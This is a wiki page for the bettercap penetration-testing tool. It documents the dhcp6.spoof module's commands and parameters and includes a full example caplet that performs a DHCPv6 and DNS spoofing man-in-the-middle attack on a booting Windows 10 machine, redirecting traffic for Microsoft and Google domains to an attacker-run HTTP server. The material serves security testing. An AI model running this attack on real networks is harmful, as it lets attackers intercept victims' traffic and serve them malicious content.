dhcp6.spoof - rhaidiz/bettercap GitHub Wiki
Replies to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attacker host as default DNS server (as described here), must be used together with the dns.spoof module.
Commands
command | description |
---|---|
dhcp6.spoof on |
Start the DHCPv6 spoofer in the background. |
dhcp6.spoof off |
Stop the DHCPv6 spoofer in the background. |
Parameters
parameter | default | description |
---|---|---|
dhcp6.spoof.domains |
microsoft.com, goole.com, facebook.com, apple.com, twitter.com |
Comma separated values of domain names to spoof. |
Examples
The following is the mitm6.cap caplet performing the full DHCPv6 attack versus a Windows 10 machine which is booting:
# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com
# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www
# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on
# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}ยป {reset}
# clear the events buffer and the screen
events.clear
clear